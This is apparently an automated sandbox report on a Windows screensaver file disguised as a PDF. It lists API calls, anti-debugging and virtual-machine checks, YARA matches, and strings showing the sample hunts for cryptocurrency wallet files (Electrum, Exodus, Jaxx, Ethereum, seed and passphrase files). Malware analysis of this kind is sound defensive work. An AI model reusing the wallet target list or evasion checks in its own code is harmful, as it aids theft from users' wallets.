Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D90880 _memset,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,_memset,SHGetFolderPathA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,GetUserNameA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,StrStrA,lstrcpyn,wsprintfA,lstrcpy,lstrlenA, 12_2_29D90880
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr API call chain: ExitProcess graph end node
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE File Volume queried: C:\Windows\System32 FullSizeInformation
Source: pdf4ik.scr, 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: )GetProcessWindowStationGetUserObjectInformationWGetLastActivePopupGetActiveWindowMessageBoxWUSER32.DLLCONOUT$DISPLAYVMwareVMware237GIWzr{~
Source: pdf4ik.scr, 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2416733096.00000000015F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: pdf4ik.scr, 0000000C.00000002.2416733096.00000000015F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW&
Source: pdf4ik.scr, 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: }DGetProcessWindowStationGetUserObjectInformationWGetLastActivePopupGetActiveWindowMessageBoxWUSER32.DLLCONOUT$DISPLAYVMwareVMware237GIWzr{~
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DB387C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_29DB387C
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DA8390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 12_2_29DA8390
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DA2920 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,HeapAlloc,std::_Xinvalid_argument,_memmove,wsprintfA,_memmove,_memmove, 12_2_29DA2920
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Process queried: DebugPort
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Process queried: DebugPort
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DB387C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_29DB387C
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DADF46 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_29DADF46
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DB77BA SetUnhandledExceptionFilter, 12_2_29DB77BA
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WerFault.exe Queries volume information: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_pdf4ik.scr_d3ed75eaedbf1e5597eeca0ea8836d4192ee030_201b8dc8_79653cc3-7dca-4c64-8ba1-b09584582b02\Report.wer VolumeInformation
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 12_2_29DB99E8
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 12_2_29DB9981
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 12_2_29DB98C1
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement, 12_2_29DB1B1C
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: GetLocaleInfoA,wsprintfA,_memset,LocalFree, 12_2_29DA3A68
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: GetProcessHeap,HeapAlloc,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,_memset,LocalFree, 12_2_29DA3A00
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s, 12_2_29DB9A24
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free, 12_2_29DB8DD9
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: GetLocaleInfoA, 12_2_29DB2DBB
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW, 12_2_29DB7E20
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 12_2_29DB817D
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free, 12_2_29DB90C7
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 12_2_29DB95EE
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea, 12_2_29DBD57F
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 12_2_29DB94F9
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 12_2_29DB96F0
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, 12_2_29DB9695
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 12_2_29DBD659
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D81190 cpuid 12_2_29D81190
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DA3900 GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime, 12_2_29DA3900
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DA3900 GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime, 12_2_29DA3900
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D90880 _memset,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,_memset,SHGetFolderPathA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,GetUserNameA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,StrStrA,lstrcpyn,wsprintfA,lstrcpy,lstrlenA, 12_2_29D90880

Stealing of Sensitive Information

Source: Yara match File source: 12.2.pdf4ik.scr.29d80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.pdf4ik.scr.29d80000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.pdf4ik.scr.29adb058.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: pdf4ik.scr PID: 6916, type: MEMORYSTR
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ElectrumLTC
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ElectronCash
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Jaxx_Desktop_Old
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: exodus.conf.json
Source: pdf4ik.scr String found in binary or memory: \Exodus\backups
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: info.seco
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: passphrase.json
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \jaxx\Local Storage\
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Ethereum\
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Ethereum"
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default_wallet
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: file__0.localstorage
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \MultiDoge\
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: seed.seco
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum-LTC\wallets\
Source: Yara match File source: 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: pdf4ik.scr PID: 6916, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 12.2.pdf4ik.scr.29d80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.pdf4ik.scr.29d80000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.pdf4ik.scr.29adb058.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: pdf4ik.scr PID: 6916, type: MEMORYSTR